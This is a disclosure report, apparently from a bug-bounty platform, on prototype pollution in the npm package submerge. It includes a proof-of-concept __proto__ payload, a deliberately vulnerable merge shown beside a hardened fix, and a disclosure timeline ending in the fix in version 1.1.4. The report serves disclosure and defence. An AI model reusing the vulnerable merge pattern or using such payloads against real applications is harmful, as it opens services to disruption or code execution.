Prototype pollution in konfirm/node-submerge


Reported on Aug 21st 2022


submerge is vulnerable to Prototype Pollution. The package does not restrict access to object prototypes while merging, so a payload containing a __proto__ key can modify Object.prototype and change the behaviour of every object in the process, which may result in Sensitive Information Disclosure, Denial of Service (DoS) or Remote Code Execution.

Proof of Concept

Create the following PoC file:

// poc.js
var merge = require("submerge")
let obj = {}
// JSON.parse creates an own "__proto__" property, which the merge then walks into
let payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}')
console.log("Before : " + {}.polluted);
merge(obj, payload);  // the nested object is copied onto Object.prototype, not onto obj
console.log("After : " + {}.polluted);

Execute the following commands in another terminal:

npm i submerge  # Install affected module
node poc.js # Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted


May result in Sensitive Information Disclosure, Denial of Service (DoS) or Remote Code Execution.
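To show why the PoC works and what the fix has to do, here is an added example (not the submerge project's code): a naive recursive merge that reproduces the pollution, beside a hardened merge that only copies own keys and skips the prototype-related ones. The names naiveMerge, safeMerge and runPoc are assumptions for this example.

```javascript
// Plain object check: excludes null, arrays and functions.
const isPlainObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);

// Vulnerable pattern: for...in visits the own "__proto__" key created by JSON.parse,
// target["__proto__"] resolves to Object.prototype, and the recursion writes into it.
function naiveMerge(target, source) {
  for (const key in source) {
    if (isPlainObject(source[key])) {
      if (!isPlainObject(target[key])) target[key] = {};
      naiveMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened pattern: own enumerable keys only, prototype-related keys skipped,
// and nested targets are created unless they are the target's own plain object.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (UNSAFE_KEYS.has(key)) continue; // never follow a path into the prototype chain
    const value = source[key];
    if (isPlainObject(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Runs the report's payload through a merge and returns what a fresh {} sees afterwards.
// Any pollution is removed again so the rest of the process is unaffected.
function runPoc(mergeFn) {
  const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}'); // constructed
  try {
    mergeFn({}, payload);
    return ({}).polluted; // undefined unless Object.prototype was written
  } finally {
    delete Object.prototype.polluted;
  }
}
```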

We are processing your report and will contact the konfirm/node-submerge team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a a year ago
We have contacted a member of the konfirm/node-submerge team and are waiting to hear back a year ago
konfirm/node-submerge maintainer gave praise a year ago
Thank you for bringing this issue to my attention. I have used the proof of concept code as the basis for a test scenario, was able to reproduce your finding and then resolve the issue.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
konfirm/node-submerge maintainer validated this vulnerability a year ago
waelahmed-dev has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
konfirm/node-submerge maintainer marked this as fixed in 1.1.4 with commit c2d67f a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
a year ago


I'm glad that I could help in making your repo more secure. Isn't there any bounty for this report? Or at least a CVE? Of course, if it's possible for you, I would be really grateful.
